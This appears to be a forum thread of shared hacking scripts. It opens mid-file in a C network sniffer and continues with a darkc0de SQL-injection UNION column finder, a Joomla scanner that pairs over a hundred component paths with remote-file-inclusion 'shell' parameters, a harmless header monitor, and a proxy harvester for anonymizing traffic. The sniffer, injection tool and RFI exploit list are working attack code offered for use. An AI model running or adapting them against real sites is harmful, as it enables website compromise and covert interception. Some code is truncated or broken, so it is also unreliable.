*/ void main(argc, argv) int argc; char **argv; { char cbuf[BUFSIZ]; struct ifconf ifc; int s, ac=1, backg=0; ProgName=argv[0]; /* getauth(); */ LOG=NULL; device=NULL; while((ac<argc) && (argv[ac][0] == '-')) { register char ch = argv[ac++][1]; switch(toupper(ch)) { case 'I': device=argv[ac++]; break; case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a"))) Zexit(1,"Output file cant be opened\n"); break; case 'B': backg=1; break; case 'D': debug=1; break; default : fprintf(ERR, "Usage: %s [-b] [-d] [-i interface] [-f file]\n", ProgName); exit(1); } } if(!device) { if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0) Pexit(1,"Eth: socket"); ifc.ifc_len = sizeof(cbuf); ifc.ifc_buf = cbuf; if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0) Pexit(1,"Eth: ioctl"); close(s); device = ifc.ifc_req->ifr_name; } fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV); fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout", (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n"); if(!LOG) LOG=stdout; signal(SIGINT, death); signal(SIGTERM,death); signal(SIGKILL,death); signal(SIGQUIT,death); if(backg && debug) { fprintf(ERR,"[Cannot bg with debug on]\n"); backg=0; } if(backg) { register int s; if((s=fork())>0) { fprintf(ERR,"[pid %d]\n",s); exit(0); } else if(s<0) Pexit(1,"fork"); if( (s=open("/dev/tty",O_RDWR))>0 ) { ioctl(s,TIOCNOTTY,(char *)NULL); close(s); } } fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid()); fflush(LOG); do_it(); }
      • 1
      • Upvote
  10. #!/usr/bin/python #SQLi column finder #This script finds the number of columns in a SQLi and a null column! #thats the short and sweet of it. #the site must be vuln to SQLi for this to work #If your sure its vuln to SQLi and its not finding the columns there are 2 possibilities. #1. only vuln to blind SQLi #2. it has over 100 columns increase to 200.. (never seen one with more than 200 columns) # Darkc0de Team # www.darkc0de.com # rsauron[at]gmail[dot]com # Greetz to # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx # and the rest of the Darkc0de members import sys, re, socket, httplib, urllib2 #Maximum Number of Columns this Script will check for! #Change this if you think column length for target site is greater then 100 colMax = 100 #Add proxy support: Format 127.0.0.1:8080 proxy = "None" print "\n rsauron:darkc0de.com Column Lenth Finder v1.0" print "---------------------------------------------------" if len(sys.argv) != 2: print "\n\tUsage: ./colfinder.py <vulnSQLi>" print "\n\tEx: ./colfinder.py \"www.site.com/news.php?id=22\"\n" sys.exit(1) siteorig = sys.argv[1] if siteorig[:7] != "http://": siteorig = "http://"+siteorig try: if proxy != "None": print "\n[+] Testing Proxy..." h2 = httplib.HTTPConnection(proxy) h2.connect() print "[+] Proxy:",proxy print "[+] Building Handler" proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'}) else: print "\n[-] Proxy Not Given" proxy_handler = "" except(socket.timeout): print "\n[-] Proxy Timed Out" sys.exit(1) except(), msg: print msg print "\n[-] Proxy Failed" sys.exit(1) print "[+] Attempting To find the number of columns..." checkfor=[] firstgo = "True" site = siteorig+"+AND+1=2+UNION+SELECT+" makepretty = "" for a in xrange(0,colMax): a = str(a) darkc0de = "darkcode"+a checkfor.append(darkc0de) opener = urllib2.build_opener(proxy_handler) if firstgo == "True": site = site+"0x"+darkc0de.encode("hex") firstgo = "False" else: site = site+",0x"+darkc0de.encode("hex") finalurl = site+"--" source = opener.open(finalurl).read() for b in checkfor: colFound = re.findall(b,source) if len(colFound) >= 1: print "[+] Column Length is:",len(checkfor) b = re.findall(("[\d]"), print "[+] Found null column at column #:",b[0] firstgo = "True" for c in xrange(0,len(checkfor)): if firstgo == "True": makepretty = makepretty+str(c) firstgo = "False" else: makepretty = makepretty+","+str(c) print "[+] Site URL:",siteorig+"+AND+1=2+UNION+SELECT+"+makepretty+"--" print "[-] Done!\n" sys.exit(1) print "[-] Sorry Column Length could not be found." print "[-] Try increasing colMax variable. or site is not injectable" print "[-] Done\n"
  11. #!/usr/bin/env python import httplib,time,socket import threading, Queue class NoResultsPending(Exception): """All work requests have been processed.""" pass class NoWorkersAvailable(Exception): """No worker threads available to process remaining requests.""" pass class WorkerThread(threading.Thread): """Background thread connected to the requests/results queues. A worker thread sits in the background and picks up work requests from one queue and puts the results in another until it is dismissed. """ def __init__(self, requestsQueue, resultsQueue, **kwds): """Set up thread in damonic mode and start it immediatedly. requestsQueue and resultQueue are instances of Queue.Queue passed by the ThreadPool class when it creates a new worker thread. """ threading.Thread.__init__(self, **kwds) self.setDaemon(1) self.workRequestQueue = requestsQueue self.resultQueue = resultsQueue self._dismissed = threading.Event() self.start() def run(self): """Repeatedly process the job queue until told to exit. """ while not self._dismissed.isSet(): # thread blocks here, if queue empty request = self.workRequestQueue.get() if self._dismissed.isSet(): # return the work request we just picked up self.workRequestQueue.put(request) break # and exit # XXX catch exceptions here and stick them to request object self.resultQueue.put( (request, request.callable(*request.args, **request.kwds)) ) def dismiss(self): """Sets a flag to tell the thread to exit when done with current job. """ self._dismissed.set() class WorkRequest: """A request to execute a callable for putting in the request queue later. See the module function makeRequests() for the common case where you want to build several work requests for the same callable but different arguments for each call. """ def __init__(self, callable, args=None, kwds=None, requestID=None, callback=None): """A work request consists of the a callable to be executed by a worker thread, a list of positional arguments, a dictionary of keyword arguments. A callback function can be specified, that is called when the results of the request are picked up from the result queue. It must accept two arguments, the request object and it's results in that order. If you want to pass additional information to the callback, just stick it on the request object. requestID, if given, must be hashable as it is used by the ThreadPool class to store the results of that work request in a dictionary. It defaults to the return value of id(self). """ if requestID is None: self.requestID = id(self) else: self.requestID = requestID self.callback = callback self.callable = callable self.args = args or [] self.kwds = kwds or {} class ThreadPool: """A thread pool, distributing work requests and collecting results. See the module doctring for more information. """ def __init__(self, num_workers, q_size=0): """Set up the thread pool and start num_workers worker threads. num_workers is the number of worker threads to start initialy. If q_size > 0 the size of the work request is limited and the thread pool blocks when queue is full and it tries to put more work requests in it. """ self.requestsQueue = Queue.Queue(q_size) self.resultsQueue = Queue.Queue() self.workers = [] self.workRequests = {} self.createWorkers(num_workers) def createWorkers(self, num_workers): """Add num_workers worker threads to the pool.""" for i in range(num_workers): self.workers.append(WorkerThread(self.requestsQueue, self.resultsQueue)) def dismissWorkers(self, num_workers): """Tell num_workers worker threads to to quit when they're done.""" for i in range(min(num_workers, len(self.workers))): worker = self.workers.pop() worker.dismiss() def putRequest(self, request): """Put work request into work queue and save for later.""" self.requestsQueue.put(request) self.workRequests[request.requestID] = request def poll(self, block=False): """Process any new results in the queue.""" while 1: try: # still results pending? if not self.workRequests: raise NoResultsPending # are there still workers to process remaining requests? elif block and not self.workers: raise NoWorkersAvailable # get back next results request, result = self.resultsQueue.get(block=block) # and hand them to the callback, if any if request.callback: request.callback(request, result) del self.workRequests[request.requestID] except Queue.Empty: break def wait(self): """Wait for results, blocking until all have arrived.""" while 1: try: self.poll(True) except NoResultsPending: break def makeRequests(callable, args_list, callback=None): """Convenience function for building several work requests for the same callable with different arguments for each call. args_list contains the parameters for each invocation of callable. Each item in 'argslist' should be either a 2-item tuple of the list of positional arguments and a dictionary of keyword arguments or a single, non-tuple argument. callback is called when the results arrive in the result queue. """ requests = [] for item in args_list.items(): if item == isinstance(item, tuple): requests.append( WorkRequest(callable, item[0], item[1], callback=callback)) else: requests.append( WorkRequest(callable, [item], None, callback=callback)) return requests paths = {"components/com_flyspray/startdown.php" : "startdown.php?file=shell", "administrator/components/com_admin/admin.admin.html.php" : "admin.admin.html.php?mosConfig_absolute_path=shell", "components/com_simpleboard/file_upload.php" : "file_upload.php?sbp=shell", "components/com_hashcash/server.php" : "server.php?mosConfig_absolute_path=shell", "components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php" : "config.inc.php?mosConfig_absolute_path=shell", "components/com_sitemap/sitemap.xml.php" : "sitemap.xml.php?mosConfig_absolute_path=shell ", "components/com_performs/performs.php" : "performs.php?mosConfig_absolute_path=shell", "components/com_forum/download.php" : "download.php?phpbb_root_path=shell", "components/com_pccookbook/pccookbook.php" : "pccookbook.php?mosConfig_absolute_path=shell", "components/com_extcalendar/extcalendar.php" : "extcalendar.php?mosConfig_absolute_path=shell", "components/minibb/index.php" : "index.php?absolute_path=shell", "components/com_smf/smf.php" : "smf.php?mosConfig_absolute_path=", "modules/mod_calendar.php" : "mod_calendar.php?absolute_path=shell ", "components/com_pollxt/conf.pollxt.php" : "conf.pollxt.php?mosConfig_absolute_path=shell ", "components/com_loudmounth/includes/abbc/abbc.class.php" : "abbc.class.php?mosConfig_absolute_path=shell", "components/com_videodb/core/videodb.class.xml.php" : "videodb.class.xml.php?mosConfig_absolute_path=shell", "components/com_pcchess/include.pcchess.php" : "include.pcchess.php?mosConfig_absolute_path=shell", "administrator/components/com_multibanners/extadminmenus.class.php" : "extadminmenus.class.php?mosConfig_absolute_path=shell", "administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php" : "admin.a6mambohelpdesk.php?mosConfig_live_site=shell", "administrator/components/com_colophon/admin.colophon.php" : "admin.colophon.php?mosConfig_absolute_path=shell", "administrator/components/com_mgm/help.mgm.php" : "help.mgm.php?mosConfig_absolute_path=shell", "components/com_mambatstaff/mambatstaff.php" : "mambatstaff.php?mosConfig_absolute_path=shell", "components/com_securityimages/configinsert.php" : "configinsert.php?mosConfig_absolute_path=shell", "components/com_securityimages/lang.php" : "lang.php?mosConfig_absolute_path=shell", "components/com_artlinks/artlinks.dispnew.php" : "artlinks.dispnew.php?mosConfig_absolute_path=shell", "components/com_galleria/galleria.html.php" : "galleria.html.php?mosConfig_absolute_path=shell", "akocomments.php" : "akocomments.php?mosConfig_absolute_path=shell", "administrator/components/com_cropimage/admin.cropcanvas.php" : "admin.cropcanvas.php?cropimagedir=shell", "administrator/components/com_kochsuite/config.kochsuite.php" : "config.kochsuite.php?mosConfig_absolute_path=shell", "administrator/components/com_comprofiler/plugin.class.php" : "plugin.class.php?mosConfig_absolute_path=shell", "components/com_zoom/classes/fs_unix.php" : "fs_unix.php?mosConfig_absolute_path=shell", "components/com_zoom/includes/database.php" : "database.php?mosConfig_absolute_path=shell", "administrator/components/com_serverstat/install.serverstat.php" : "install.serverstat.php?mosConfig_absolute_path=shell", "components/com_fm/fm.install.php" : "fm.install.php?lm_absolute_path=shell", "administrator/components/com_mambelfish/mambelfish.class.php" : "mambelfish.class.php?mosConfig_absolute_path=shell", "components/com_lmo/lmo.php" : "lmo.php?mosConfig_absolute_path=shell", "administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php" : "toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell", "components/com_mtree/Savant2/Savant2_Plugin_textarea.php" : "Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell", "administrator/components/com_jim/install.jim.php" : "install.jim.php?mosConfig_absolute_path=shell", "administrator/components/com_webring/admin.webring.docs.php" : "admin.webring.docs.php?component_dir=shell", "administrator/components/com_remository/admin.remository.php" : "admin.remository.php?mosConfig_absolute_path=shell", "administrator/components/com_babackup/classes/Tar.php" : "Tar.php?mosConfig_absolute_path=shell", "administrator/components/com_lurm_constructor/admin.lurm_constructor.php" : "admin.lurm_constructor.php?lm_absolute_path=shell", "components/com_mambowiki/MamboLogin.php" : "MamboLogin.php?IP=shell", "administrator/components/com_a6mambocredits/admin.a6mambocredits.php" : "admin.a6mambocredits.php?mosConfig_live_site=shell", "administrator/components/com_phpshop/toolbar.phpshop.html.php" : "toolbar.phpshop.html.php?mosConfig_absolute_path=shell", "components/com_cpg/cpg.php" : "cpg.php?mosConfig_absolute_path=shell", "components/com_moodle/moodle.php" : "moodle.php?mosConfig_absolute_path=shell ", "components/com_extended_registration/registration_detailed.inc.php" : "registration_detailed.inc.php?mosConfig_absolute_path=shell", "components/com_mospray/scripts/admin.php" : "admin.php?basedir=shell", "administrator/components/com_bayesiannaivefilter/lang.php" : "lang.php?mosConfig_absolute_path=shell", "administrator/components/com_uhp/uhp_config.php" : "uhp_config.php?mosConfig_absolute_path=shell", "administrator/components/com_peoplebook/param.peoplebook.php" : "param.peoplebook.php?mosConfig_absolute_path=shell", "administrator/components/com_mmp/help.mmp.php" : "help.mmp.php?mosConfig_absolute_path=shell", "components/com_reporter/processor/reporter.sql.php" : "reporter.sql.php?mosConfig_absolute_path=shell", "components/com_madeira/img.php" : "img.php?url=shell", "components/com_jd-wiki/lib/tpl/default/main.php" : "main.php?mosConfig_absolute_path=shell", "components/com_bsq_sitestats/external/rssfeed.php" : "rssfeed.php?baseDir=shell", "com_bsq_sitestats/external/rssfeed.php" : "rssfeed.php?baseDir=shell", "components/com_slideshow/admin.slideshow1.php" : "admin.slideshow1.php?mosConfig_live_site=shell", "administrator/components/com_panoramic/admin.panoramic.php" : "admin.panoramic.php?mosConfig_live_site=shell", "administrator/components/com_mosmedia/includes/credits.html.php" : "credits.html.php?mosConfig_absolute_path=shell", "administrator/components/com_mosmedia/includes/info.html.php" : "info.html.php?mosConfig_absolute_path=shell", "administrator/components/com_mosmedia/includes/media.divs.php" : "media.divs.php?mosConfig_absolute_path=shell", "administrator/components/com_mosmedia/includes/media.divs.js.php" : "media.divs.js.php?mosConfig_absolute_path=shell", "administrator/components/com_mosmedia/includes/purchase.html.php" : "purchase.html.php?mosConfig_absolute_path=shell", "administrator/components/com_mosmedia/includes/support.html.php" : "support.html.php?mosConfig_absolute_path=shell", "administrator/components/com_wmtportfolio/admin.wmtportfolio.php" : "admin.wmtportfolio.php?mosConfig_absolute_path=shell", "components/com_mp3_allopass/allopass.php" : "components/com_mp3_allopass/allopass.php?mosConfig_live_site=shell", "components/com_mp3_allopass/allopass-error.php" : "components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=shell", "administrator/components/com_jcs/jcs.function.php" : "administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=shell", "administrator/components/com_jcs/view/add.php" : "administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=shell", "administrator/components/com_jcs/view/history.php" : "administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=shell", "administrator/components/com_jcs/view/register.php" : "administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=shell", "administrator/components/com_jcs/views/list.sub.html.php" : "administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=shell", "administrator/components/com_jcs/views/list.user.sub.html.php" : "administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=shell", "administrator/components/com_jcs/views/reports.html.php" : "administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=shell", "com_joomla_flash_uploader/install.joomla_flash_uploader.php" : "com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell", "com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php" : "com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell", "administrator/components/com_jjgallery/admin.jjgallery.php" : "administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=shell", "administrator/components/com_juser/xajax_functions.php" : "administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=shell", "components/com_jreviews/scripts/xajax.inc.php" : "components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=shell", "com_directory/modules/mod_pxt_latest.php" : "com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=shell", "administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php" : "administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell", "administrator/components/com_chronocontact/excelwriter/PPS/File.php" : "administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=shell", "administrator/components/com_chronocontact/excelwriter/Writer.php" : "administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=shell", "administrator/components/com_chronocontact/excelwriter/PPS.php" : "administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=shell", "administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php" : "administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=shell", "administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=shell", "administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=shell", "administrator/components/com_chronocontact/excelwriter/Writer/Format.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=shell", "index.php?option=com_custompages" : "index.php?option=com_custompages&cpage=shell", "component/com_onlineflashquiz/quiz/common/db_config.inc.php" : "component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=shell", "administrator/components/com_joomla-visites/core/include/myMailer.class.php" : "administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=shell", "index.php?option=com_facileforms" : "components/com_facileforms/facileforms.frame.php?ff_compath=shell", "administrator/components/com_rssreader/admin.rssreader.php" : "administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=shell", "administrator/components/com_feederator/includes/tmsp/add_tmsp.php" : "administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=shell", "administrator/components/com_feederator/includes/tmsp/edit_tmsp.php" : "administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=shell", "administrator/components/com_feederator/includes/tmsp/subscription.php" : "administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=shell", "administrator/components/com_feederator/includes/tmsp/tmsp.php" : "administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=shell", "administrator/components/com_clickheat/install.clickheat.php" : "administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=shell", "administrator/components/com_clickheat/includes/heatmap/_main.php" : "administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=shell", "administrator/components/com_clickheat/includes/heatmap/main.php" : "administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=shell", "administrator/components/com_clickheat/includes/overview/main.php" : "administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=shell", "administrator/components/com_clickheat/Recly/Clickheat/Cache.php" : "administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=shell", "administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php" : "administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=shell", "administrator/components/com_clickheat/Recly/common/GlobalVariables.php" : "administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=shell", "administrator/components/com_competitions/includes/competitions/add.php" : "administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=shell", "administrator/components/com_competitions/includes/competitions/competitions.php" : "administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=shell", "administrator/components/com_competitions/includes/settings/settings.php" : "administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=shell", "administrator/components/com_dadamail/config.dadamail.php" : "administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=shell", "administrator/components/com_googlebase/admin.googlebase.php" : "administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=shell", "administrator/components/com_ongumatimesheet20/lib/onguma.class.php" : "administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=shell", "administrator/components/com_treeg/admin.treeg.php" : "administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=shell"} def usage(): print """\tUsage: ./joomlascan.py <site> <options> \t[options] \t -p/--proxy <host:port> : Add proxy support \t -e/--errors : Show Error responses \t -j : path to joomla if needed Ex: ./joomlascan.py www.test.com -404 -p 127.0.0.1:8080 """ sys.exit(1) def testproxy(proxy): try: httplib.HTTPConnection(proxy).connect() except: print "Proxy broke! Reverting to Direct Connect Ctrl-C Now if this scares you!" time.sleep(3) globals()['proxy']='' def testhost(host): try: httplib.HTTPConnection(host).connect() except: print "Host down, or you're an idiot! Either way, I'm out of here!" sys.exit(1) def runattack(apath,shell): proxy=globals()['proxy'] host=globals()['host'] path=globals()['joomlapath'] p404=globals()['p404'] #print "Apath:",apath,"- Shell:",shell if proxy: h=httplib.HTTP(proxy) h.putrequest("GET", "http://"+host+"/"+path+"/"+apath) else: h=httplib.HTTP(host) h.putrequest("HEAD", "/"+path+"/"+apath) h.putheader("Host", host) h.endheaders() try: status, reason, headers = h.getreply() if status==200: print 'Found: '+apath+': Use Shell: '+shell elif p404: print 'Not Found:',apath,status,reason except(), msg: print "Error Occurred:",msg pass if __name__=="__main__": import getopt,sys print "\n\tJoomlaScan++ - Now Not As Ghey!" print "\t--------------------------------------------" try: opts, args = getopt.getopt(sys.argv[1:], "hep:j:", ["help", "output="]) except getopt.GetoptError, err: usage() socket.setdefaulttimeout(6) p404=False proxy='' host='' joomlapath='' for o, a in opts: if o == "-v": verbose = True elif o in ("-h", "--help"): usage() elif o in ("-p", "--proxy"): proxy=a elif o in ("-e","--errors"): p404=True elif o in ("-j","--joomlapath"): joomlapath=a else: usage() if args: host=args[0] else: usage() if proxy: testproxy(proxy) testhost(host) attackpool=ThreadPool(20) for item in paths.items(): attackpool.putRequest(WorkRequest(runattack,item)) print "Main thread working..." while 1: try: attackpool.poll() time.sleep(0.5) except (KeyboardInterrupt): print "User Break... Exiting..." break except (NoResultsPending): print "Scan Finished: Exiting." break
  12. #!usr/bin/python import httplib, socket, time, re, os, sys, datetime # Hello world! os.system('clear') print "===================================================" print "== Webserverwatcher.py | www.ethicalhack3r.co.uk ==" print "===================================================" print url = raw_input("Enter the URL you want to keep an eye on: ") # Check URL http = "http://" if http in url: print print "ERROR! Remove http:// from the URL." url = raw_input("Enter the URL you want to keep an eye on: ") count = 0 while 1: # Count how many times the script has run count = count + 1 # Get todays date/time getdate = datetime.datetime.today() today = getdate.strftime("%d/%m/%Y %H:%M:%S") # Get webserver IP socket.setdefaulttimeout(15) try: socket.gethostbyname(url) except socket.error: os.system('clear') print "===================================================" print "== Webserverwatcher.py | www.ethicalhack3r.co.uk ==" print "===================================================" print print "SOCKET ERROR! 1)Check the URL 2)Check your internet connection 3)Try again." print sys.exit() # HTTP HEAD request conn = httplib.HTTPConnection(url, 80) try: conn.request("HEAD", "/") except socket.timeout: print "Webserver has timed out. Check URL and internet connection." # Read HTTP response res = conn.getresponse() # Close HTTP connection conn.close() # Turn headers into variables ip = socket.gethostbyname(url) server = res.getheader('Server') xpoweredby = res.getheader('x-powered-by') date = res.getheader('date') # Print some output os.system('clear') print "===================================================" print "== Webserverwatcher.py | www.ethicalhack3r.co.uk ==" print "===================================================" print print res.status, res.reason print if xpoweredby == None: print ip + " " + server + " " + date else: print ip + " " + server + " " + xpoweredby + " " + date print print "The script has run", count, "time/s." if (count < 2): # Save header data to log file outfile = file('log.txt', 'w') outfile.write("Started on " + today + "\n") outfile.write(ip + " ") outfile.write(server + " ") # Check if xpoweredby header exists, if it does save to log if xpoweredby != None: outfile.write(xpoweredby + " ") outfile.write(date + "\n") outfile.close() else: outfile.write(date + "\n") outfile.close() # Print some output print print "Logged!" print else: # Read file to compare old/new headers readfile = open('log.txt', "r") text = readfile.read() # Check if log file IP is same as new IP if ip not in text: outfile = file('log.txt', 'a') outfile.write('IP address has been changed! New IP is ' + ip + ' ' + date + '\n') outfile.close() # Check if log file server is same as new server if server not in text: outfile = file('log.txt', 'a') outfile.write('Web Server software has been changed! New server is ' + server + ' ' + date + '\n') outfile.close() # Check if log file x-powered-by header is same as new one if xpoweredby != None and xpoweredby not in text: outfile = file('log.txt', 'a') outfile.write('X-powered-by header has been changed! New header is ' + xpoweredby + ' ' + date + '\n') outfile.close() # Time to wait between HTTP requests (3600 seconds = 1hr) try: time.sleep(3600) except KeyboardInterrupt: outfile = file('log.txt', 'a') outfile.write("Finished on " + today) outfile.close() print print "Check log.txt." print sys.exit()
  13. #!/usr/bin/python # # linux ONLY # # ProxyHarvest.py v1.1 # # REQUIREMENTS: # - GeoIP Database + GeoIP Python API # - sudo apt-get install libgeoip1 && sudo apt-get install python-geoip (ubuntu/debian) # # Extract IP:Port from a proxylist site code from low1z lurking at darkc0de.com # this code is protected under the gpl get your copy at <http://www.gnu.org/licenses/> # # update from 0.9 - 1.1 notes # - fetch planetlab(codeen) proxylist & clean our list with it # - validate external ip with whatsmyip.com # - GeoIP # # - !! due to urllib1/2 limitations there is no way yet to except username/passwd input !! import sys, os, urllib, urllib2, re, httplib, sets, socket from time import time, localtime, strftime from socket import gethostbyaddr nogeoip = 0 try: import GeoIP except: nogeoip = 1 print "\nGeoIP Module/Database NOT found, try:" print "sudo apt-get install libgeoip1 && sudo apt-get install python-geoip" print "or visit www[.]maxmind[.]com for download" print "GeoIP is not required but highly recommended!\n" output = 'proxylist.txt' sleeptimer = 3 socket.setdefaulttimeout(2) alivelist = [] myipadress = urllib.urlopen('http://www.whatismyip.com/automation/n09230945.asp').read() anon_list = [] trans_list = [] planetlab = [] sites = ['http://www.darkc0de.com/cgi-bin/proxies.py', 'http://www.1proxyfree.com/', 'http://www.atomintersoft.com/products/alive-proxy/socks5-list/', 'http://www.proxylist.net/', 'http://www.proxylists.net/http_highanon.txt'] def StripTags(text): return re.sub(r'<[^>]*?>','', text) def timer(): now = strftime('%H:%M:%S-%d/%b/%Y', localtime()) return now def ipcheck(proxy): try: pxhandle = urllib2.ProxyHandler({"http": proxy}) opener = urllib2.build_opener(pxhandle) urllib2.install_opener(opener) myip = urllib2.urlopen('http://www.whatismyip.com/automation/n09230945.asp').read() xs = re.findall(('\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}'), StripTags(myip)) if xs[0] == myipadress or myipadress == myip: trans_list.append(proxy) print proxy[:-1],"\t- ALIVE -", timer(), "- TRANSPARENT" elif xs == None: pass else: anon_list.append(proxy) print proxy[:-1],"\t- ALIVE -", timer(), "- EXT-iP :",xs[0] except KeyboardInterrupt: print "\n\nCTRL+C - check temporary proxylist file\n\n" sys.exit(0) except: pass def proxyvalidator(proxylist): finalcount = 0 for proxy in proxylist: proxy.replace('\n', '') try: proxies = {'http': "http://"+proxy[:-1]} opener = urllib.FancyURLopener(proxies) try: loopchk = opener.open("http://www.google.com").read() except: pass except(IOError,socket.timeout), detail: pass ipcheck(proxy) alivelist.append(proxy) finalcount += 1 return alivelist def getsamairdotru(): counter = 1 pxycnt = 0 maxpages = 10 urls = [] pfile = file(output, 'a') while counter <= maxpages: if counter < 10: # workaround for page-01 to page-09 opener = urllib2.build_opener() opener.addheaders = [('User-agent', 'Mozilla/5.0')] url = opener.open('http://www.samair.ru/proxy/proxy-0'+repr(counter)+'.htm').read() else: opener = urllib2.build_opener() opener.addheaders = [('User-agent', 'Mozilla/5.0')] url = opener.open('http://www.samair.ru/proxy/proxy-'+repr(counter)+'.htm').read() strings = re.findall(('\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}:\d{1,5}'), StripTags(url)) for string in strings: pfile.write(string+"\n") pxycnt = pxycnt+1 counter = counter+1 opener.close() print pxycnt, "\t: Proxies received from : http://www.samair.ru/proxy/" pfile.close() def getsinglesitelist(site): pxycnt = 0 urls = [] pfile = file(output, 'a') opener = urllib2.build_opener() opener.addheaders = [('User-agent', 'Mozilla/5.0')] url = opener.open(site).read() strings = re.findall(('\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}[:]\d{1,5}'), StripTags(url)) for string in strings: pfile.write(string+"\n") pxycnt = pxycnt+1 print pxycnt, "\t: Proxies recieved from :", site.split("//",3)[1] opener.close() pfile.close() def getplanetlabs(): opener = urllib2.build_opener() url = opener.open('http://fall.cs.princeton.edu/codeen/tabulator.cgi?table=table_all').read() strings = re.findall(('\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}'), StripTags(url)) for string in strings: planetlab.append(string) print len(planetlab), "\t: PlanetLab Proxylist Loaded", "\n" def cleanup(): pfile = open(output, 'r').readlines() outfile = file(output, 'w') sorted = [] finalcount = 0 psremove = 0 for proxy in pfile: if proxy.split(':',1)[0] not in planetlab: if proxy not in sorted: sorted.append(proxy) outfile.write(proxy) finalcount += 1 if proxy.split(':',1)[0] in planetlab: psremove += 1 print "\n", psremove, "\t: PlanetLab (CoDeen) Proxies removed!" print finalcount,"\t: unique Proxies found\n" print "+-[Starting Validation]-----------------------------------------------------+" outfile.close() def fileConst(): fileC = open(output, 'w') falive = [] fileC.write('+ This List has been generated with proxyharvest_1.1.py // www.darkc0de.com\n') fileC.write('+ ANONYMOUS PROXIES\n\n') for anon in anon_list: fileC.write(anon) if anon in alivelist: alivelist.remove(anon) fileC.write('\n\n+ TRANSPARENT PROXIES\n\n') for trans in trans_list: fileC.write(trans) if trans in alivelist: alivelist.remove(trans) fileC.write('\n\n+ WORKING BUT UNCLEAR PROXIES\n\n') alivelist.sort() for alive in alivelist: fileC.write(alive) fileC.close() def helpme(): print "| -s / -sitecollect :: gathers proxylists |" print "| -m / -multipage :: get incremental pages |" print "| -a / -all :: do ALL!!! |" print "| -vl / - validatelist :: check a file |" print "+-----------------------------------------------+" try: os.remove(output) except: pass print "+-----------------------------------------------+" print "| ProxyHarvest.py 1.1 |" print "| low1z 2009 // darkc0de |" print "+-----------------------------------------------+" print "IP:", myipadress, "//", timer(), "\n" getplanetlabs() if len(sys.argv) <= 1: print "\n\t < use -help to get options >\n" 